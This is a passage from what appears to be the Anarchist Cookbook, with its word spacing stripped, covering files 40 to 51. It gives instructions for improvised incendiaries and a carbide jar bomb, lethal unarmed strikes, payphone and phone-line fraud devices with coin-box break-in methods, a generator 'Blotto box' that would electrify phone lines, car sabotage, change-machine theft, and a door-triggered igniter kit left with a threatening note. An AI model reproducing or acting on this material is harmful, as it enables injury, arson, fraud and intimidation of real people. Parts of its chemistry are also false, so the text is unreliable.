Fillthebottle3/4fullwithLiquidPlumberandaddalittlepieceofaluminum foiltoit.Puttheballoonovertheneckofthebottleuntiltheballoonis fulloftheresultinggas.Thisishighlyflammablehydrogen.Nowtiethe balloon.Nowlightthefuse,andletitrise.Whenthefusecontactsthe balloon,watchout!!! 40.HowtoKillSomeonewithyourBareHandsbyTheJollyRoger Thisfilewillexplainthebasicsofhandtohandcombat,andwilltellofthe bestplacestostrikeandkillanenemy.Whenengagedinhandtohandcombat, yourlifeisalwaysatstake.Thereisonlyonepurposeincombat,andthatis tokillyourenemy.Neverfaceanenemywiththeideaofknockinghimout.The chancesareextremelygoodthathewillkillYOUinstead.Whenaweaponisnot available,onemustresorttothefulluseofhisnaturalweapons.Thenatural weaponsare: 1. 2. 3. 4. 5. 6. 7. 8. Theknifeedgeofyourhands. Fingersfoldedatthesecondjointorknuckle. Theprotrudingknuckleofyoursecondfinger. Theheelofyourhand. Yourboot Elbows Knees YourTeeth.

Attackingisaprimaryfactor.Afightwasneverwonbydefensiveaction.Attack withallofyourstrength.Atanypointoranysituation,somevulnerablepoint onyourenemiesbodywillbeopenforattack.Dothiswhilescreamingas

screaminghastwopurposes. 1. Tofrightenandconfuseyourenemy. 2. Toallowyoutotakeadeepbreathwhich,inturn,willputmoreoxygenin yourbloodstream. Yourbalanceandbalanceofyourenemyaretwoimportantfactors;since,ifyou succeedinmakingyourenemylosehisbalance,thechancesareninetoonethat youcankillhiminyournextmove.Thebestoverallstanceiswhereyourfeet arespreadaboutshoulderswidthapart,withyourrightfootaboutafootahead oftheleft.Botharmsshouldbebentattheelbowsparalleltoeachother. Standontheballsofyourfeetandbendyourwaistslightly.Kindoflikea boxer'scrouch.Employingasuddenmovementorascreamoryellcanthrowyour enemyoffbalance.Therearemanyvulnerablepointsofthebody.Wewillcover themnow: Eyes:UseyourfingersinaVshapeandattackingougingmotion. Nose:(Extremelyvulnerable)Strikewiththeknifeedgeofthehandalongthe bridge,whichwillcausebreakage,sharppain,temporaryblindness,andifthe blowishardenough,death.Also,deliverablowwiththeheelofyourhandin anupwardmotion,thiswillshovetheboneupintothebraincausingdeath. Adam'sApple:Thisspotisusuallyprettywellprotected,butifyougetthe chance,strikehardwiththeknifeedgeofyourhand.Thisshouldseverthe windpipe,andthenit'salloverinamatterofminutes. Temple:Thereisalargearteryuphere,andifyouhitithardenough,itwill causedeath.Ifyoumanagetoknockyourenemydown,kickhiminthetemple,and he'llnevergetupagain. BackoftheNeck:Arabbitpunch,orblowdeliveredtothebaseoftheneckcan easilybreakit,buttobesafe,itisbettertousethebuttofagunorsome otherheavybluntobject. Upperlip:Alargenetworkofnervesarelocated.Thesenervesareextremely closetotheskin.Asharpupwardblowwillcauseextremepain,and unconsciousness. Ears:Comingupfrombehindanenemyandcuppingthehandsinaclappingmotion overthevictimsearscankillhimimmediately.Thevibrationscausedfromthe clappingmotionwillbursthiseardrums,andcauseinternalbleedinginthe brain. Groin:AVERYvulnerablespot.Ifleftopen,getitwithkneehard,andhe'll buckleoververyfast. Kidneys:Alargenervethatbranchesofftothespinalcordcomesverycloseto theskinatthekidneys.Adirectblowwiththeknifeedgeofyourhandcan causedeath. Therearemanymorewaystokillandinjureanenemy,buttheseshouldworkbest fortheaverageperson.ThisismeantonlyasinformationandIwouldnot recommendthatyouusethisforasimpleHighSchoolBrawl.Usethesemethods only,inyouropinion,ifyourlifeisindanger.Anyoneofthesemethodscould veryeasilykillorcausepermanentdamagetosomeone.Onemorewordofcaution, youshouldpracticethesemovesbeforeusingthemonadummy,oramockbattle withafriend.(Youdon'thavetoactuallyhithimtopractice,justworkon accuracy.) 41.PhoneSystemsTutorialIIIbyTheJollyRoger

Preface: ThisarticlewillfocusprimarilyonthestandardwesternelectricsingleSlot cointelephone(akafortressfone)whichcanbedividedinto3types: ? ? ? dialtonefirst(dtf) coinfirst(cf):(i.e.,itwantsyour$beforeyoureceiveadialtone) dialpostpayservice(pp):youpayafterthepartyanswers

Depositingcoins(slugs): Onceyouhavedepositedyourslugintoafortress,itissubjectedtoaGamutof tests.Thefirstobstacleforaslugisthemagnetictrap.Thiswillstopany lightweightmagneticslugsandcoins.Ifitpassesthis,theslugisthen classifiedasanickel,dime,orQuarter.Eachslugisthencheckedfor appropriatesizeandweight.IfThesetestsarepassed,itwillthentravel throughanickel,dime,orquarterMagnetasappropriate.Thesemagnetssetup aneddycurrenteffectwhichCausescoinsoftheappropriatecharacteristicsto slowdownsotheyWillfollowthecorrecttrajectory.Ifallgoeswell,thecoin willfollowtheCorrectpath(suchasbouncingoffofthenickelanvil)whereit willHopefullyfallintothenarrowacceptedcoinchannel.Theratherelaborate teststhatareperformedasthecointravelsdowntheCoinchutewillstopmost slugsandotherundesirablecoins,suchasPennies,whichmustthenberetrieved usingthecoinreleaselever.Iftheslugmiraculouslysurvivesthegamut,it willthenstriketheAppropriatetotalizerarmcausingaratchetwheeltorotate onceforevery5centincrement(e.g.,aquarterwillcauseittorotate5 times).Thetotalizerthencausesthecoinsignaloscillatortoreadoutadual frequencysignalindicatingthevaluedepositedtoacts(acomputer)ortheTsps operator.Thesearethesametonesusedbyphreaksintheinfamousredboxes. Foraquarter,5beeptonesareoutpulsedat1217pulsespersecond(pps).A dimecauses2beeptonesat58?ppswhileanickelcausesonebeeptoneat5 8?pps.Abeepconsistsof2tones:2200+1700hz.Arelayinthefortress calledthe"BRelay"(yes,thereisalsoan'arelay')placesacapacitoracross thespeechcircuitduringtotalizerreadouttopreventthe"customer"from hearingtheredboxtones.Inolder3slotphones:onebell(10501100hz)fora nickel,twobellsforadime,andonegong(800hz)foraquarterareused insteadofthemoderndualfrequencytones. TSPS&ACTS Whilefortressesareconnectedtothecoofthearea,alltransactionsare handledviathetrafficservicepositionsystem(tsps).Inareasthatdonot haveacts,allcallsthatrequireoperatorassistance,suchascallingcardand collect,areautomaticallyroutedtoatspsoperatorposition.Inaneffortto automatefortressservice,acomputersystemknownasautomatedcointoll service(acts)hasbeenimplementedinmanyareas.Actslistenstotheredbox signalsfromthefonesandtakesappropriateaction.Itisactswhichsays,"two dollarsplease(pause)pleasedeposittwodollarsforthenexttenseconds"(and othervariations).Also,ifyoutalkformorethanthreeminutesandthenhang up,actswillcallbackanddemandyourmoney.Actsisalsoresponsiblefor automatedcallingcardservice.Actsalsoprovidetroublediagnosisfor craftspeople(repairmenspecializinginfortresses).Forexample,thereisa cointestwhichisgreatfortuningupredboxes.Inmanyareasthistestcanbe activatedbydialing09591230atafortress(thankstokarlmarxforthis information).Onceactivateditwillrequestthatyoudepositvariouscoins.It willthenidentifythecoinandoutpulsetheappropriateredboxsignal.The coinsareusuallyreturnedwhenyouhangup.Tomakesurethatthereisactually moneyinthefone,thecoinitiatesa"groundtest"atvarioustimesto determineifacoinisactuallyinthefone.Thisiswhyyoumustdepositat leastanickelinordertousearedbox! GreenBoxes: Payingtheinitialrateinordertousearedbox(oncertainfortresses)lefta sourtasteinmanyredboxer'smouthsthusthegreenboxwasinvented.Thegreen boxgeneratesusefultonessuchascoincollect,coinreturn,andringback.

ThesearethetonesthatactsorthetspsoperatorwouldsendtoThecowhen appropriate.Unfortunately,thegreenboxcannotbeusedatafortressstation butitmustbeusedbythecalledparty. Herearethetones: CoinCollect 700+1100Hz CoinReturn 1100+1700Hz Ringback 700+1700Hz Beforethecalledpartysendsanyofthesetones,anoperatorreleasedsignal shouldbesenttoalerttheMFdetectorsattheco.Thiscanbeaccomplishedby sending900+1500hzorasingle2600hzwink(90ms)followedbya60msgap andthentheappropriatesignalforatleast900Ms. Also,donotforgetthattheinitialrateiscollectedshortlybeforethe3 minuteperiodisup.Incidentally,oncetheaboveMFtonesforcollectingand returningcoinsreachtheco,theyareconvertedintoanappropriatedcpulse (130voltsforreturn&+130voltsforcollect).Thispulseisthensentdown thetiptothefortress.Thiscausesthecoinrelaytoeitherreturnorcollect thecoins.Thealleged"tnetwork"takesadvantageofthisinformation.Whena pulseforcoincollect(+130vdc)issentdowntheline,itmustbegrounded somewhere.Thisisusuallyeithertheyelloworblackwire.Thus,ifthewires areexposed,thesewirescanbecuttopreventthepulsefrombeinggrounded. Whenthethreeminuteinitialperiodisalmostup,makesurethattheblack& yellowwiresaresevered;thenhangup,waitabout15secondsincaseofa secondpulse,reconnectthewires,pickupthefone,hangupagain,andifall goeswellitshouldbe"jackpot"time. PhysicalAttack: Atypicalfortressweighsroughly50lbs.Withanemptycoinbox.Mostofthis isaccountedforinthearmorplating.Whyallthesecurity?Well,Bell contributesittothefollowing:"socialchangesduringthe1960'smadethe multislotcoinstationaprimetargetfor:vandalism,strongarmrobbery,fraud, andtheftofservice.Thisbroughtabouttheintroductionofthemorerugged singleslotcoinstationandanewenvironmentforcoinservice."Asforpicking thelock,IwillquoteMr.Phelps:"Weoftenfantasizeabout'pickingthelock' or'gettingamasterkey.'Well,youcanforgetaboutit.Idon'tliketo discouragepeople,butitwillsaveyoufromwastingalotofourtimetime whichcanbeputtobetteruse(heh,heh)."Asforphysicalattack,thecoin plateissecuredonallfoursidebyhardenedsteelboltswhichpassthroughtwo slotseach.Theseboltsareinturninterlockedbythemainlock.OnephreakI knowdidmanagetotakeoneofthe'mothers'home(whichwasattachedtoapiece ofplywoodataconstructionsite;otherwise,thepermanentonesareabitchto detachfromthewall!).Ittookhimalmosttenhourstoopenthecoinboxusing apowerdrill,sledgehammers,andcrowbars(whichwasemptyperhapsnext time,hewilldepositacoinfirsttohearifitslushesdownnicelyorhitsthe emptybottomwithaclunk.) Takingthefoneoffersahighermarginofsuccess.Althoughthismaybe difficultoftenrequiringbruteforceandtherehasbeenseveralcasesofback axlesbeinglosttryingtotakedownafone!Aquickanddirtywaytoopenthe coinboxisbyusingashotgun.InDetroit,afterecologistscleanedouta municipalpond,theyfound168coinphonesrifled.Incolderareas,suchas Canada,someshrewdpeopletapeupthefonesusingducttape,pourinwater,and comebackthenextdaywhenthewaterwillhavefrozethusexpandingand crackingthefoneopen.Inonecase,"unauthorizedcoincollectors"wherecaught whentheybrought$6,000inchangetoabankandthebankbecamesuspicious... Atanyrate,themainlockisaneightleveltumblerlocatedontherightside ofthecoinbox.Thislockhas390,625possiblepositions(5^8,sincethere are8tumblerseachwith5possiblepositions)thusitishighlypickresistant! Thelockisheldinplaceby4screws.Ifthereissufficientclearancetothe rightofthefone,itisconceivabletopunchoutthescrewsusingthedrilling

patternbelow(providedbyAlexanderMuddyintap#32): !!^ !!! !13/16"!!! !<>!!1?" ! !!!!!! !(+)(+)! !!!!^ !!!!!! !!(Z)!!!! !!!!!23/16" !!!!! !(+)(+)!! !!!!! !! !! (Z)KEYHOLE(+)SCREWS !! Afterthisisaccomplished,thelockcanbepushedbackwardsdisengagingthe lockfromthecoverplate.Thefourboltsofthecoverplatecanthenbe retractedbyturningtheboltworkswithasimplekeyintheshapeofthehole onthecoinplate(seediagrambelow).Ofcourse,thereareothermethodsand drillingpatterns. _ !! () !_! [ROUGHLY] DIAGRAMOFCOVERPLATEKEYHOLE Thetopcoverusesasimilar,butnotasstronglockingmethodwiththekeyhole depictedaboveonthetoplefthideandaregularlock(probablytumbleralso) onthetoprighthandside.Itisinterestingtoexperimentwiththecoinchute andthefortressesown"redbox"whichbelldidn'thavetheballstocolorred. Miscellaneous: Inafewareas(rural&Canada),postpayserviceexists.Withthistypeof service,themouthpieceiscutoffuntilthecallerdepositsmoneywhenthe calledpartyanswers.Thisalsoallowsforfreecallstoweatherandotherdial itservices!Recently,2600magazineannouncedtheclearboxwhichconsistsofa telephonepickupcoilandasmallamp.Itisbasedontheprincipalthatthe receiverisalsoaweaktransmitterandthatbyamplifyingyoursignalyoucan talkviathetransmitterthusavoidingcostlytelephonecharges!Mostfortresses arefoundinthe9xxxarea.Underformerbellareas,theyusuallystartat98xx (rightbelowthe99xxofficialseries)andmovedownward. Sincetheline,notthefone,determineswhetherornotadepositmustbemade, dtf&chargeacallfonesmakegreatextensions!Finally,fortressfonesallow foranewhobbyinstructionplatecollecting.Allthatisrequiredisaflat headscrewdriverandapairofneedlenosepliers.Simplyusethescrewdriverto liftunderneaththeplatesothatyoucangrabitwiththepliersandyank downwards.Iwouldsuggestcoveringthetipsoftheplierswithelectricaltape topreventscratching.Tencentplatesaredefinitelybecominga"rarity!" Fortresssecurity: Whilealonelyfortressmayseemtheperfecttarget,beware!Thegestapohas

beenknowntostakeoutfortressesforaslongas6yearsaccordingtothegrass rootsquarterly.Toavoidanyproblems,donotusethesamefonesrepeatedlyfor boxing,callingcards,&otherexperiments.TheTelcoknowshowmuchmoney shouldbeinthecoinboxandwhenitsnottheretheytendtogetperturbed (Read:PissedOff). 42.BlackBoxPlansbyTheJollyRoger Introduction: Atanygiventime,thevoltagerunningthroughyourphoneisabout20Volts. Whensomeonecallsyou,thisvoltagegoesupto48Voltsandringsthebell. Whenyouanswer,thevoltagegoesdowntoabout10Volts.Thephonecompanypays attentiontothis.Whenthevoltagedropsto10,theystartbillingtheperson whocalledyou. Function: TheBlackBoxkeepsthevoltagegoingthroughyourphoneat36Volts,sothatit neverreaches10Volts.Thephonecompanyisthusfooledintothinkingyounever answeredthephoneanddoesnotbillthecaller.However,afteraboutahalf hourthephonecompanywillgetsuspiciousanddisconnectyourlineforabout10 seconds. Materials: ? ? ? 11.8K?WattResistor 11?VLED 1SPSTSwitch

Procedure: 1. Openyourphonebylooseningthetwoscrewsonthebottomandliftingthe caseoff. 2. Thereshouldbethreewires:Red,Green,andYellow.We'llbeworkingwith theRedWire. 3. Connectthefollowinginparallel: ? TheResistorandLED. ? TheSPSTSwitch.

Inotherwords,youshouldendupwiththis: (RedWire) !/\/\/\O! (Line)!!(Phone) !_/_! /\/\/\=Resistor O=LED _/_=SPST Use: TheSPSTSwitchistheOn/OffSwitchoftheBlackBox.Whentheboxisoff,your phonebehavesnormally.Whentheboxisonandyourphonerings,theLED flashes.Whenyouanswer,theLEDstaysonandthevoltageiskeptat36V,so thecallingpartydoesn'tgetcharged.Whentheboxison,youwillnotgeta dialtoneandthuscannotmakecalls.Alsorememberthatcallsarelimitedto halfanhour. PSDuetonewFoneCompanyswitchingsystems&thelike,thismayormaynot

workinyourarea.IfyouliveinBumfuckKentucky,thentrythisout.Imakeno guarantees!(Ineverdo...) 43.TheInfamousBlottoBox!!byTheJollyRoger (Ibetthatnoonehastheballstobuildthisone!) Finally,itishere!Whatwasfirstconceivedasajoketofooltheinnocent phreakersaroundAmericahasfinallybeenconceived!Well,foryoupeoplewho areunenlightenedabouttheBlottoBox,hereisabriefsummeryofalegend. TheBlottoBox ForyearsnoweverypiratehasdreamedoftheBlottoBox.Itwasatfirstmade asajoketomockmoreignorantpeopleintothinkingthatthefunctionofit actuallywaspossible.Well,ifyouareTheVoltageMaster,itispossible. OriginallyconceivedbyKingBlottoofmuchfame,theBlottoBoxisfinally availabletothepublic. NOTE:JollyRogercannotberesponsiblefortheinformationdisclosedinthe file!Thisfileisstrictlyforinformationalpurposesandshouldnotbe actuallybuiltandused!Usageofthiselectronicalimpulsemachinecouldhave thesevereresultslistedbelowandcouldresultinhighfederalprosecution! Again,ITAKENORESPONSIBILITY!Allright,nowthatthatisclearedup,hereis thebasisoftheboxandit'sfunction. TheBlottoBoxiseveryphreaksdream...youcouldholdAT&Tdownonitsknee's withthisdevice.Because,quitesimply,itcanturnoffthephonelines everywhere.Nothing.Blotto.Nocallswillbeallowedoutofanareacode,and nocallswillbeallowedin.Nocallscanbemadeinsideitforthatmatter.As longastheswitchingsystemstaysthesame,thisboxwillnotstopatamere areacode.Itwillstopatnothing.Theelectricalimpulsesthatemitfromthis boxwillopeneveryline.Everylinewillringandringandring...thevoltage willneverbecutoffuntilthebox/generatorisstopped.Thisisno200volt job,here.WearetalkingGENERATOR.Everyphonelinewillcontinuetoring,and peopleclosetotheboxmaybeelectrocutediftheypickupthephone.But,the BlottoBoxcanbestoppedbymerelycuttingofthelineorgenerator.Ifthey arecutoffthennothingwillemitanylonger.Itwilltakeawhileforthebox tocalmbackdownagain,butthatismerelyasuperficialaftereffect.Once again:Constructionanduseofthisboxisnotadvised!TheBlottoBoxwill continueaslongasthereiselectricitytocontinuewith.OK,thatiswhatit does,now,herearesomeinterestingthingsforyoutodowithit... BlottoFunctions/Installing OnceyouhaveinstalledyourBlotto,thereisnoturningback.Thefollowingare theinstructionsforconstructionanduseofthisbox.Pleasereadandheedall warningsintheabovesectionbeforeyouattempttoconstructthisbox. Materials: ? AHondaportablegeneratororamainpoweroutletlikeinastadiumor somesuchplace. ? 400voltratedcouplerthatsplicesafemaleplugintoaphonelinejack. ? Ameterofvoltagetoattachtotheboxitself. ? Agreenbase(i.e.oneoftheniceboxesabout3'by4'thatyousee aroundinyourneighborhood.Theyarethemainswitchboardsandwouldbeamore effectivelinetostartwithoraregularphonejack(notyourown,andnotin yourareacode!) ? Asolderingironandmuchsolder. ? Aremotecontrolorlongwoodenpole. Now.Youmusthaveguessedtheconstructionfromthat.Ifnot,heregoes,Iwill explainindetail.TaketheHondaPortableGeneratorandalloftheotherlisted

equipmentandgooutandhuntforagreenbase.Makesureitisoneonthe groundorhangingatheadlevelfromapole,notthehugeonesatthetopof telephonepoles.Openitupwithanythingconvenient,ifyouaretwofeeblethen fuck,don'ttrythis.Takealookinside...youarehuntingforcolor coordinatinglinesofgreenandred.Now,takeoutyourradioshackcordandrip themeterthingoff.Replaceitwiththevoltagemeterabout.Agoodlevelto setthevoltagetoisabout1000volts.Now,attachthevoltagemetertothe cordandsetthelimitforonethousand.Plugtheotherendofthecordintothe generator.Takethephonejackandsplicethejackpartoff.Openitupand matchtheredandgreenwireswiththeotherredandgreenwires. NOTE:Ifyoujusthadthegeneratoronandhavedonethisinthecorrectorder, youwillbeacrispycritter.Keepthegeneratoroffuntilyouplantostartit up.Now,solderthoselinestogethercarefully.Wrapducktapeorinsulation tapearoundallofthewires.Now,placetheremotecontrolrightontothe startupofthegenerator.Ifyouhavethelongpole,makesureitisverylong andstandbackasfarawayasyoucangetandreachthepoleover. NOTICE:Ifyouaregoingrightalongwiththiswithoutreadingthefilefirst, youstillrealizenowthatyourareacodeisabouttobecomenull!Then,getting back,twitchthepole/remotecontrolandrunforyourdamnlife.Anywhere,just getawayfromit.Itwillbegeneratingsomuchelectricitythatifyoustandto closeyouwillkillyourself.Thegeneratorwillsmoke,etc.butwillnotstop. Youarenowkillingyourareacode,becauseallofthatenergyisspreading throughallofthephonelinesaroundyouineverydirection. Haveaniceday! TheBlottoBox:Aftermath Well,thatistheplansforthemostdevastatingandultimatelydeadly boxevercreated.Myhatgoesoffto:KingBlotto(fortheoriginalidea). 44.BlowgunbyTheJollyRoger InthisarticleIshallattempttoexplaintheuseandmanufactureofapowerful blowgunandmakingdartsforthegun.Thepossessionoftheblowgundescribed inthisarticleISafelony.Sobecarefulwhereyouuseit.Idon'twanttoget youallbusted. Needed: 1. Severalstrandsofyarn(About2inchesapiece). 2. Aregularpencil. 3. A2?inchlongneedle(hopefullywithabeadedhead.Ifnotobtainable, wraptapearoundendofneedle. 4. ?footpipe.(PVCorAluminum)Halfainchindiameter. Constructingthedart: 1. Carefullytwistandpullthemetalpart(Alongwitheraser)ofthepencil tillitcomesoff. 2. TakePinandstartputtingabout57Strandsofyarnonthepin.Thenpush themuptothetopofthepin.Butnotovertheheadofthepin(orthetape). 3. Pushpinthroughthehollowpartoftheheadwherethepencilwasbefore. 4. Thatshouldforanicelookingdart.(seeillustration) ##### >>>>>/#istheyarn >istheheadofthepencil isthepinitself /istheheadofthepin

UsingtheDarts: 1. Nowtakethefinisheddartandinsertitinthetube(ifitistoosmall putonmoreyarn.) 2. Aimthetubeatadoor,wall,sister,ect. 3. Blowontheendofthepipe. 4. Sometimestheendofthepipemaybesharp.WhenthishappensIsuggest youwrapitwithsomeblackelectriciantape.Itshouldfeelalotbetter. 45.BrownBoxPlansbyTheJollyRoger Thisisafairlysimplemodthatcanbemadetoanyphone.Allitdoesisallow youtotakeanytwolinesinyourhouseandcreateapartyline.SofarIhave notheardofanyonewhohasanyproblemswithit.Thereisonethingthatyou willnoticewhenyouareoneofthetwopeoplewhoiscalledbyapersonwitha brownbox.Theotherpersonwillsoundalittlebitfaint.Icouldovercomethis withsomeamplifiersbutthentherewouldn'tbeverymanyofthesemade[Why not?].Ithinktheconvenienceofhavingtwopeopleonthelineatoncewill makeupforanyminorvolumeloss. Hereisthediagram: KEY:___________________________________ |PART|SYMBOL| || |BLACKWIRE|*| |YELLOWWIRE|=| |REDWIRE|+| |GREENWIRE|| |SPDTSWITCH|_/_| |_/_| |VERTICALWIRE||| |HORIZONTALWIRE|_| *=+ *=+ *=+ *=+ *=+ *==_/_+ *******_/_++++++ || || || || || || |_____PHONE____| 46.CalciumCarbideBombbyTheJollyRoger ThisisEXTREMELYDANGEROUS.Exerciseextremecaution....Obtainsomecalcium carbide.Thisisthestuffthatisusedincarbidelampsandcanbefoundat nearlyanyhardwarestore.Takeafewpiecesofthisstuff(itlookslike gravel)andputitinaglassjarwithsomewater.Putalidontightly.The carbidewillreactwiththewatertoproduceacetylenecarbonatewhichis similartothegasusedincuttingtorches.Eventuallytheglasswithexplode frominternalpressure.Ifyouleaveaburningragnearby,youwillgetanice fireball!

47.MoreWaystoSendaCartoHellbyTheJollyRoger Duetoalotofcompliments,Ihavewrittenanupdatetofile#14.Ihaveleft theoriginalintact.Thisexpandsupontheoriginalidea,andcouldbewell calledasequel. Howtohavephunwithsomeoneelse'scar.Ifyoureallydetestsomeone,andI meandetest,here'safewtipsonwhattodoinyoursparetime.Movethe windshieldwiperblades,andinsertandgluetacks.Thetacksmakelovely designs.Ifyour"friend"goestoschoolwithyou,Justbeforehecomesoutof school.Lightalighterandthenputitdirectlyunderneathhiscardoor handle.Wait...Leave...Listen.Whenyouhearaloud"shit!",youknowhemade ittohiscarintime.Removehismufflerandpourapproximately1Cupofgas init.Putthemufflerback,thenwaittilltheircarstarts.Thenyouhavea cigarettelighter.A30footlongcigarettelighter.Thisoneiseffective,and anyfoolcandoit.Removethetopairfilter.That'sit!Oraoldiebut goodie:sugarinthegastank.Stuffragssoakedingasuptheexhaustpipe. Thenyouwonderwhyyour"friend"hastroublewithhis/herlungs.Here'sone thattakestimeandmanyfriends.Takehis/hercarthenbreakintotheirhouse andreassembleit,intheirlivingorbedroom.Phuneh?Ifyou'reinto engines,sayeeniminemoeandpointtosomethingandremoveit.Theywonderwhy somethingdoesn'twork.Therearesomanyothers,buttherealgoodjuicyones comebythinkinghard. 48.RippingoffChangeMachinesbyTheJollyRoger Haveyoueverseenoneofthosereallybigchangermachinesinairports Laundromatsorarcadesthatdispensechangewhenyouputinyour1or5dollar bill?Wellthen,hereisanarticleforyou. 1. Findthetypeofchangemachinethatyouslideinyourbilllengthwise, notthetypewhereyouputthebillinatrayandthenslidethetrayin!!! 2. Afterfindingtherightmachine,geta$1or$5bill.Startcrumplingup intoaball.Thensmoothoutthebill,nowitshouldhaveaverywrinkly surface. 3. Nowthehardpart.Youmusttearanotchinthebillontheleftside about?inchbelowthelittle1dollarsymbol(SeeFigure). 4. Ifyouhavedoneallofthisrightthentakethebillandgooutthe machine.Putthebillinthemachineandwait.Whatshouldhappenis:whenyou putyourbillinthemachineitthinkseverythingisfine.Whenitgetstothe partofthebillwiththenotchcutout,themachinewillrejectthebilland (ifyouhavedoneitright)giveyouthechangeatthesametime!!!So,youend upgettingyourbillback,plusthechange!!Itmighttakealittlepractice, butonceyougetthehangofit,youcangetalotofmoney! \Makenotchhere.About?"downfromthe1. 49.ClearBoxPlansbyTheJollyRoger Theclearboxisanewdevicewhichhasjustbeeninventedthatcanbeused throughoutCanadaandruralUnitedStates.Theclearboxworkson"PostPay" payphones(fortressfones).Thosearethepayphonesthatdon'trequirepayment untilaftertheconnectionisestablished.Youpickupthefone,getadial tone,dialyournumber,andtheninsertyourmoneyafterthepersonanswers.If youdon'tdepositthemoneythenyoucannotspeaktothepersonontheother

endbecauseyourmouthpieceiscutoffbutnottheearpiece.(obviouslythese phonesareniceforfreecallstoweatherortimeorothersuchrecordings).All youmustdoistogotoyournearbyRadioShack,orelectronicsstore,andgeta fourtransistoramplifierandatelephonesuctioncupinductionpickup.The inductionpickupwouldbehookedupasitnormallywouldtorecorda conversation,exceptthatitwouldbepluggedintotheoutputoftheamplifier andamicrophonewouldbehookedtotheinput.Sowhenthepartythatisbeing calledanswers,thecallercouldspeakthroughthelittlemicrophoneinstead. Hisvoicethengoesthroughtheamplifierandouttheinductioncoil,andinto thebackofthereceiverwhereitwouldthenbebroadcastthroughthephone linesandtheotherpartywouldbeabletohearthecaller.TheClearBoxthus 'clearsup'theproblemofnotbeingheard.Luckily,thelinewillnotbecut offafteracertainamountoftimebecauseitwillwaitforeverforthecoinsto beputin.Thebiggestadvantageforallofusaboutthisnewclearboxisthe factthatthistypeofpayphonewillmostlikelybecomeverycommon.Duetoa fewthings:1st,itisacheapwayofgettingtheDTF,dialtonefirstservice, 2nd,itdoesn'trequireanyspecialequipment,(forthephonecompany)This payphonewillworkonanyphoneline.Usuallyapayphonelineisdifferent,but thisisaregularphonelineanditissetupsothephonedoesallthe charging,notthecompany. 50.CNAListbyTheJollyRoger NPA 201 202 203 204 205 206 207 208 209 212 213 214 215 216 217 218 219 301 302 303 304 305 306 307 308 309 312 313 314 315 316 317 318 319 401 402 403 404 TELNUMBER NPA 2016767070 3043437016 2037896815 2049490900 2059887000 2063825124 6177875300 3032938777 4155432861 5184718111 4157815271 2144647400 4126335600 6144640123 2175255800 4025802255 3172654834 3043431401 4126335600 3032938777 3043448041 9127840440 3063472878 3032938777 4025802255 2175255800 3127969600 3132238690 3147216626 5184718111 8162752782 3172654834 5042455330 4025802255 6177875300 4025802255 4034252652 9127840440 TELNUMBER NPA TELNUMBER 415 4155436374 709 416 4164430542 712 417 3147216626 713 418 5147252491 714 419 6144640123 715 501 4052366121 716 502 5025832861 717 503 2063825124 718 504 5042455330 801 505 3032938777 802 506 5066483041 803 507 4025802255 804 509 2063825124 805 512 5128282501 806 513 6144640123 807 514 5147252491 808 515 4025802255 809 516 5184718111 812 517 3132238690 813 518 5184718111 814 519 4164430542 815 601 6019618139 816 602 3032938777 817 603 6177875300 818 604 6044322996 819 605 4025802255 901 606 5025832861 902 607 5184718111 904 608 6082526932 906 609 2016767070 907 612 4025802255 912 613 4164430542 913 614 6144640123 914 615 6153735791 915 616 3132238690 916 617 6177875300 918 618 2175255800 919 619 8185017251 900 ***NONE*** 4025802255 7138617194 8185017251 6082526932 5184718111 4126335600 5184718111 3032938777 6177875300 9127840440 3043447935 4155432861 5128282501 4164430542 2123344336 2123344336 3172654834 8132287871 4126335600 2175255800 8162752782 2144647400 4157815271 5147252491 6153735791 9024214110 9127840440 3132238690 ***NONE*** 9127840440 8162752782 5184718111 5128282501 4155432861 4052366121 9127840440 2016767070

405 406 408 409 412 413 414

4052366121 3032938777 4155436374 7138617194 4136335600 6177875300 6082526932

701 702 703 704 705 706 707

4025802255 4155432861 3043447935 9127840440 4169793469 ***NONE*** 4155436374

51.ElectronicTerrorismbyTheJollyRoger 1. Itstartswhenabig,dumblummoxrudelyinsultsyou.Beingofa rational,intelligentdisposition,youwiselychoosetoavoida(direct) confrontation.Butashelaughsinyourface,yousmileinwardlyyourrevenge isalreadyplanned. 2. Followyourvictimtohislocker,car,orhouse.Onceyouhavechosen yourtargetsite,laylowforaweekormore,lettingyourangerboil. 3. Inthemeantime,assembleyourversatileterroristkit(detailsbelow.)

4. PlantyourkitatthedesignatedtargetsiteonaMondaymorningbetween thehoursof4:00amand6:00am.Includeacalm,suggestivenotethatquietly hintsatthepossibilityofanotherattack.Donotwriteitbyhand!An exampleofaneffectivenote:"don'tbesuchajerk,orthenextonewilltake offyourhand.Haveaniceday."Noticehowthecalmtoneinstillsfear.Asif writtenbyahomicidalpsychopath. 5. Chooseastrategiclocationoverlookingthetargetsite.Trytoposition yourselfinsuchawaythatyoucanseehisfacialcontortions. 6. Sitbackandenjoythefireworks!Assemblyoftheversatile,economic,and effectiveterroristkit#1:thepartsyou'llneedare: ? 4AAbatteries ? 19voltbattery ? 1SPDTminirelay(radioshack) ? 1rocketengine(smokebomborm80) ? 1solarigniter(anyhobbystore) ? 19voltbatteryconnector 1. Takethe9voltbatteryandwireitthroughtherelay'scoil.Thiscircuit shouldalsoincludeapairofcontactsthatwhenseparatedcutoffthiscircuit. Thesecontactsshouldbeheldtogetherbytrappingthembetweenthelocker, mailbox,orcardoor.Oncethedoorisopened,thecontactsfallapartandthe 9voltcircuitisbroken,allowingtherelaytofalltotheclosedpositionthus closingtheignitioncircuit.(Ifallthisisconfusingtakealookatthe schematicbelow.) 2. Takethe4AAbatteriesandwiretheminsuccession.Wirethepositive terminalofonetothenegativeterminalofanother,untilallfourare connectedexceptonepositiveterminalandonenegativeterminal.Eventhough thefourAAbatteriesonlycombinetocreate6volts,theincreaseinamperage isnecessarytoactivatethesolarigniterquicklyandeffectively. 3. Takethebatterypack(madeinstep2)andwireoneendofittothe relay'ssinglepoleandtheotherendtooneprongofthesolarigniter.Then wiretheotherprongofthesolarigniterbacktotheopenpositiononthe relay. 4. Usingdoublesidedcarpettapemountthekitinhislocker,mailbox,or cardoor.Andlast,insertthesolarigniterintotherocketengine(smokebomb orm80).

